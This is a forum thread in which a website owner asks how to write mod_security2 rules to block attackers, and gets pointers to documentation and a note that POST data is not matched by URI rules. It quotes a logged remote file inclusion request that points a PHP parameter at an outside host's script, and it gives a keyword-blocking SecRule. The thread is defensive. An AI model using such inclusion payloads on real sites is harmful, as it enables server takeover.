HOW: Create my own mod_security2 rules?

[SuperBaby]

I checked my mod_security2 log file and see a lot of entries similar to this:

GET /myfolder1/main.php?id=http://submitstation.de/xxxxxx/cmd.jpg

How do I set up a mod_security2 rule so that the hacker is stopped when:

1) He points his browser to my URL and the URL contain a specific word. In the above case, I would ban "submitstation.de".

2) He submits a form from my site and the content contains a specific word.

 

[cPDan]

http://www.cpanel.net/support/docs/easyapache_modsecurity_module.htm

may help, specifically this part: "Please see http://www.modsecurity.org/ for many excellent resources like tips and rules and FAQs."

 

[SuperBaby]

SecRule "REQUEST_URI|QUERY_STRING" "aaa|bbb"

I added the rule above to mod_security2. It successfully forbid the access if the URL contains aaa or bbb. But it does not prevent aaa and bbb from a submission form.

 

[cPDan]

SecRule "REQUEST_URI|QUERY_STRING" "aaa|bbb"

I added the rule above to mod_security2. It successfully forbid the access if the URL contains aaa or bbb. But it does not prevent aaa and bbb from a submission form.

a form, at least via POSt is not part of the URI or QUERY_STRING, your best bet is to ask the mod security folks how to filter POST requests

 

[SuperBaby]

I believe the answer is in this simple manual http://www.modsecurity.org/documentation/ModSecurity2_Rule_Language.pdf but I don't think I understand this deep language.